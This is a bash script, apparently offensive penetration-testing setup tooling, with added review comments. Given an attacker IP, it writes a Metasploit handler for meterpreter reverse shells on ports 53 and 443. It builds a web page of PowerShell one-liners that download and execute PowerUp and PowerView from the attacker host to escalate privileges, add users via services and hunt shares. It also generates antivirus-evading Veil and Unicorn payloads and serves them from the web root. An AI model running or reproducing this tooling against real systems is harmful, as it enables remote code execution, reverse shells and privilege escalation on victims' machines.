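#!/bin/bash
#Usage
#######################################
# Print the usage banner when the script is called without an LHOST.
# Globals:   none
# Arguments: none ($0 is used for the script name)
# Outputs:   usage text on stdout
# Returns:   0
#######################################
display_usage(){
  # Clearing the screen is cosmetic; it fails (with a message) when there is
  # no terminal, so silence it rather than leak noise into captured output.
  clear 2>/dev/null || true
  printf '%s\n' \
    "============================================================" \
    "This script requires a LHOST IP address." \
    "" \
    "Usage: $0 10.10.10.10" \
    "============================================================" \
    ""
}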
# Argument check: with no LHOST given, only the usage banner is printed.
# NOTE(review): this exits 0 on a usage error, so a wrapper cannot tell that
# nothing was generated. $1 is never validated as an IP address before being
# written unquoted into every file below.
if [ $# -le 0 ]
then
display_usage
exit 0
fi
#MSF resource file
# Writes a Metasploit resource script to /bounce (a file at the filesystem
# root, overwritten on every run) with the LHOST taken from $1. Each line is
# one console command, executed in file order when the resource is loaded.
echo "use exploit/multi/handler" > /bounce
echo "jobs -K" >> /bounce
echo "set payload windows/meterpreter/reverse_tcp" >> /bounce
echo "set exitonsession false" >> /bounce
echo "set lport 53" >> /bounce
echo "set enablestageencoding true" >> /bounce
echo "set autorunscript migrate -f" >> /bounce
echo "set LHOST $1" >> /bounce
echo "exploit -j -z" >> /bounce
echo "set payload windows/meterpreter/reverse_https" >> /bounce
echo "set lport 443" >> /bounce
echo "exploit -j -z" >> /bounce
#Setup /var/www/cmd.html page
# Builds a reference page in the web root whose text is a set of PowerShell
# one-liners pointing at http://$1:8080/. The file is served like any other
# web-root content, so anyone who can reach the web server can read it: it
# discloses the LHOST and the tool names in use. Nothing in it is
# HTML-escaped; the text is emitted verbatim.
echo "<b>Invoke-AllChecks</b><p><p>" > /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-Allchecks\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Write-UserAddServiceBinary</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-ServiceUserAdd</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-FindLocalAdminAccess</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-FindLocalAdminAccess\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-userhunter</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-userhunter\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-ShareFinder</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt\"" >> /var/www/cmd.html
#Setup Veil payloads
# Clears artifacts from a previous run before regenerating. Plain rm (no -f)
# prints an error for every file that does not exist yet, e.g. on a first
# run; that noise is harmless but makes a genuine removal failure hard to
# spot. There is no set -e anywhere in this script, so a failing generator
# below does not stop it, and the page still ends up referencing files that
# were never produced.
rm /root/HTTPS_443.exe
rm /root/TCP_53.exe
rm /root/power443.txt
rm /root/power53.txt
rm /var/www/HTTPS_443.exe
rm /var/www/TCP_53.exe
rm /var/www/power443.txt
rm /var/www/power53.txt
rm /usr/share/veil-evasion/compiled/HTTPS_443.exe
rm /usr/share/veil-evasion/handlers/HTTPS_443_handler.rc
rm /usr/share/veil-evasion/source/HTTPS_443.rb
# Runs Veil-Evasion non-interactively with the payload/LPORT/LHOST given and
# output name HTTPS_443. The cp lines assume the build lands in
# /usr/share/veil-evasion/compiled/ — verify against the installed version.
/root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_https -c LPORT=443 LHOST=$1 -o HTTPS_443
cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /root/HTTPS_443.exe
cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /var/www/HTTPS_443.exe
rm /usr/share/veil-evasion/compiled/TCP_53.exe
rm /usr/share/veil-evasion/handlers/TCP_53_handler.rc
rm /usr/share/veil-evasion/source/TCP_53.rb
# Same sequence for the TCP variant, output name TCP_53.
/root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LPORT=53 LHOST=$1 -o TCP_53
cp /usr/share/veil-evasion/compiled/TCP_53.exe /root/TCP_53.exe
cp /usr/share/veil-evasion/compiled/TCP_53.exe /var/www/TCP_53.exe
#Setup Unicorn payload
# Runs unicorn.py and then copies /root/tools/powershell_attack.txt; the
# script assumes that is where unicorn writes its output (presumably its
# working directory) — confirm, since the cp fails silently otherwise.
python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https $1 443
cp /root/tools/powershell_attack.txt /root/power443.txt
cp /root/tools/powershell_attack.txt /var/www/power443.txt
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Powershell HTTPS Payload</b><p><p>" >> /var/www/cmd.html
# The generated text is appended to the web page verbatim (no escaping), so
# it is published alongside everything else in cmd.html.
cat /root/power443.txt >> /var/www/cmd.html
# Second unicorn run; the same powershell_attack.txt path is reused, so the
# HTTPS output is overwritten before this copy is taken.
python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp $1 53
cp /root/tools/powershell_attack.txt /root/power53.txt
cp /root/tools/powershell_attack.txt /var/www/power53.txt
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Powershell TCP Payload</b><p><p>" >> /var/www/cmd.html
cat /root/power53.txt >> /var/www/cmd.html